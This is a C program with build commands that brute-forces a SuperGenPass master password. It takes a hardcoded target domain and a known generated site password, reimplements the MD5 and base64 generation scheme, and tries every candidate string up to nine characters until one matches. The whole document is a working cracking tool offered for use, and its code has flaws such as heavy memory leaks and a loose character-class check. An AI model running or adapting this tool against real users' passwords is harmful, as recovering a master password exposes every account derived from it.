Supergenpass Bruteforcer in C

brute.c

#include <math.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include "global.h"
#include "md5.h"

static char encoding_table[] = {'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',
                                'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',
                                'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X',
                                'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',
                                'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
                                'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
                                'w', 'x', 'y', 'z', '0', '1', '2', '3',
                                '4', '5', '6', '7', '8', '9', '+', '/'};
static int mod_table[] = {0, 2, 1};

char* domain = "jonesbigasswebsiteandmerchandisecenter.com";
char* checkhash = "fwYHFFx5xs";
char* charset = "aeorisn1tl2md0cp3hbuk45g9687yfwjvzxqASERBTMLNPOIDCHGKFJUW.!Y*@V-ZQX_$#,/+?;^ %~=&`\\)][:<(>\"|{'}";
int charsetlen = 95;
time_t starttime,currenttime;
int attempts=0;

static void MDString PROTO_LIST ((char *));


#define MD5_CTX MD5_CTX
#define MDInit MD5Init
#define MDUpdate MD5Update
#define MDFinal MD5Final

static void MDString(char *string, unsigned char* digest)
{
    MD5_CTX context;
    unsigned int len = strlen (string);
    MDInit (&context);
    MDUpdate (&context, string, len);
    MDFinal (digest, &context);
}

char* base64_encode(const unsigned char *data,size_t input_length,size_t *output_length) {
    *output_length = (size_t) (4.0 * ceil((double) input_length / 3.0));
    char *encoded_data = malloc(*output_length);
    if (encoded_data == NULL) return NULL;
    int i,j;
    for (i = 0, j = 0; i < input_length;) {
        uint32_t octet_a = i < input_length ? data[i++] : 0;
        uint32_t octet_b = i < input_length ? data[i++] : 0;
        uint32_t octet_c = i < input_length ? data[i++] : 0;
        uint32_t triple = (octet_a << 0x10) + (octet_b << 0x08) + octet_c;
        encoded_data[j++] = encoding_table[(triple >> 3 * 6) & 0x3F];
        encoded_data[j++] = encoding_table[(triple >> 2 * 6) & 0x3F];
        encoded_data[j++] = encoding_table[(triple >> 1 * 6) & 0x3F];
        encoded_data[j++] = encoding_table[(triple >> 0 * 6) & 0x3F];
    }
    for (i = 0; i < mod_table[input_length % 3]; i++)
        encoded_data[*output_length - 1 - i] = '=';
    return encoded_data;
}

char* base64digest(char* tohash) {
    unsigned char digest[16];
    MDString(tohash,digest);
    char* ret;
    size_t outsize;
    ret = base64_encode(digest,(size_t)16,&outsize);
    return ret;
}

unsigned strcpy_translate_check(char* dst, const char* src){
    char* transfrom = "=+/";
    char* transto = "A98";
    unsigned lower = 0;
    unsigned upper = 0;
    unsigned numeric = 0;
    unsigned i=0;
    //we make sure that the hash starts with a lower case letter
    if(src[i]>=97 && src[i]<=122)
        lower=1;
    for(i=0;src[i]!='\0';i++){
        dst[i] = src[i];
        //we make sure that the hash includes an upper case letter
        if(src[i]>=60 && src[i]<=90)
            upper=1;
        //we make sure that the hash includes a number
        if(src[i]>=48 && src[i]<=57)
            numeric=1;
        //for some reason supergen pass doesn't like 
        //there chars so we filter them out and replace them
        unsigned x;
        for(x=0;transfrom[x]!='\0';x++){
            if(src[i]==transfrom[x]) {
                dst[i]=transto[x];
            }
        }        
    }
    dst[i] = '\0';
    return (lower && upper && numeric);
}

char* supergenpass(char* password,char* domain){
    char* tohash = malloc(100);
    strcpy(tohash,password);
    strcat(tohash,":");
    strcat(tohash,domain);
    char* hashed = malloc(25);
    int i;
    unsigned ret = 1;
    for(i=0;i<10 || ret==0;i++){
        hashed = base64digest(tohash);
        ret = strcpy_translate_check(tohash,hashed);
    }
    char* output = malloc(11);
    for(i=0;i<10;i++)
    {
        output[i]=tohash[i];
    }
    output[i]='\0';
    return output;
}

int recurse(char* string,int stringlen,int length){
    int i;
    int ret=0;
    char* toyield = malloc(stringlen);
    char* tmptoyield = malloc(stringlen+1);
    strcpy(toyield,string);
    for(i=0;i<charsetlen;i++) {
        toyield[stringlen-1]=charset[i];
        if(stringlen == length) {
            //performance monitoring stuff
            attempts++;
            if(attempts % 100000 == 0){
                time(&currenttime);
                int t = currenttime-starttime;
                printf("Checking: %s\n",toyield);
                printf("Attempts: %d\n",attempts);
                printf("Time    : %d\n",t);
                printf("Speed   : %f a/s\n\n",((float)attempts/(float)t));  
            }
            if(strcmp(supergenpass(toyield,domain),checkhash)==0){
                printf("Found password: %s\n",toyield);
                free(toyield);
                return 1;
            }
        }
        else {
            strcpy(tmptoyield,toyield);
            strcat(tmptoyield,"a");
            ret = recurse(tmptoyield,stringlen+1,length);
        }
        if(ret==1){
            free(toyield);
            return 1;
        }
    }
    free(toyield);
    return 0;
}

void main(int argc, char *argv[]){
    //set our starttime for performance checking
    time(&starttime);
    int i;
    for(i=1;i<10;i++)
        if(recurse("a",1,i)==1)
            i=1000;
}

shell.sh

$ wget http://userpages.umbc.edu/~mabzug1/cs/md5/md5-c-100.tar.gz
$ tar xvzf md5-c-100.tar.gz
$ cp ./md5-c/* ./
$ make
$ gcc -lm -g -o brute brute.c md5c.o
$ ./brute